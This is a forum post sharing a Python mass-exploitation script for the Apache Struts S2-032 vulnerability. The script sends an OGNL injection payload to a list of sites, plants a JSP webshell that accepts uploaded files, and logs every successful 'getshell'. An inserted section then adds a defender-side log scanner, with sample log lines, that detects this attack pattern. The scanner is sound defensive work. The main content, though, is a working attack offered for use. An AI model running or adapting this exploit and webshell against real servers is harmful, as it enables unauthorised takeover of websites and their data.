C4r1st posted on 2016-4-26 20:44:38

S2-032 mass getshell: drops a small webshell in the web root

Struts S2-032

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-04-26 17:38:52
# @Last Modified by:   Lcy
# @Last Modified time: 2016-04-26 18:20:45
import requests
import sys
if len(sys.argv) < 2:
    print "Example: python exp.py list.txt"
    exit()
weblist = sys.argv
payload = "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj,%23c%3d%23parameters.reqobj,%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj,%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content.getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=lcy.jsp&content=%3C%25@%20page%20language%3D%22java%22%20pageEncoding%3D%22gbk%22%25%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.File%22%2f%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.OutputStream%22%2f%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.FileOutputStream%22%2f%3E%3C%25%20int%20i%3D0%3BString%20method%3Drequest.getParameter%28%22act%22%29%3Bif%28method%21%3Dnull%26%26method.equals%28%22yoco%22%29%29%7BString%20url%3Drequest.getParameter%28%22url%22%29%3BString%20text%3Drequest.getParameter%28%22smart%22%29%3BFile%20f%3Dnew%20File%28url%29%3Bif%28f.exists%28%29%29%7Bf.delete%28%29%3B%7Dtry%7BOutputStream%20o%3Dnew%20FileOutputStream%28f%29%3Bo.write%28text.getBytes%28%29%29%3Bo.close%28%29%3B%7Dcatch%28Exception%20e%29%7Bi%2b%2b%3B%25%3E0%3C%25%7D%7Dif%28i%3D%3D0%29%7B%25%3E1%3C%25%7D%25%3E%3Cform%20action%3D%27%3Fact%3Dyoco%27%20method%3D%27post%27%3E%3Cinput%20size%3D%22100%22%20value%3D%22%3C%25%3Dapplication.getRealPath%28%22%2f%22%29%20%25%3E%22%20name%3D%22url%22%3E%3Cbr%3E%3Ctextarea%20rows%3D%2220%22%20cols%3D%2280%22%20name%3D%22smart%22%3E"
f = open(weblist)
for l in f.readlines():
    url = l.strip()+ payload
    try:
      r = requests.get(url,timeout=5)
      res = r.text
      if "lcy.jsp" in res:
            f = open("result.txt","a")
            f.write(l.strip()+ payload + "\r\n\r\n")
            print "\n %s Getshell Success!" % l.strip(),
    except:
      pass
```
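A defender-side check, added here and not part of the post or of the tool above: it scans constructed access-log lines for the S2-032 signature the payload above depends on, an OGNL expression smuggled in through the `method:` action prefix (Dynamic Method Invocation). The log lines, regexes and function names are my own assumptions, and the OGNL test is slightly broader than the exact payload so it also flags variants that use a different `@class@` static reference.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the original post).
# Line 1 carries the S2-032 pattern; line 2 is a benign DMI call (method:list);
# line 3 mentions _memberAccess only in an ordinary parameter value.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Apr/2016:20:44:38 +0800] "GET /app/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d1 HTTP/1.1" 200 512
10.0.0.6 - - [26/Apr/2016:20:45:01 +0800] "GET /app/index.action?method:list&page=2 HTTP/1.1" 200 2048
10.0.0.7 - - [26/Apr/2016:20:45:09 +0800] "GET /app/search.action?q=%23_memberAccess HTTP/1.1" 200 1024
"""

# Request line inside a combined-format log entry.
REQ_RE = re.compile(r'"(?P<verb>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')
# The "method:" action prefix; Struts uses its value as the action method name,
# which is what S2-032 abuses when DMI is enabled.
PREFIX_RE = re.compile(r'(?:^|[?&])method:(?P<expr>[^&]*)')

def is_s2_032_probe(target):
    """True if the request target passes an OGNL expression via method:.
    A plain method name (method:list) is legitimate DMI use and is not flagged;
    a value starting with '#', naming _memberAccess, or using @class@ static
    access is treated as an injection attempt."""
    for m in PREFIX_RE.finditer(target):
        expr = unquote(m.group('expr'))
        if expr.startswith('#') or '_memberAccess' in expr or re.search(r'@[\w.]+@', expr):
            return True
    return False

def scan_log(text):
    """Return (line_number, client_ip, request_target) for each suspicious entry."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQ_RE.search(line)
        if m and is_s2_032_probe(m.group('target')):
            hits.append((n, line.split(' ', 1)[0], m.group('target')))
    return hits

if __name__ == '__main__':
    for n, ip, target in scan_log(SAMPLE_LOG):
        print(f"line {n}: {ip} -> {target[:80]}")
```

Run it over a real access log by replacing SAMPLE_LOG with the file contents; hits on hosts still running a Struts version with DMI enabled are worth treating as attempted exploitation rather than noise.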

No0d1es posted on 2016-4-27 08:59:35

Huh, I got the first reply, nobody has commented yet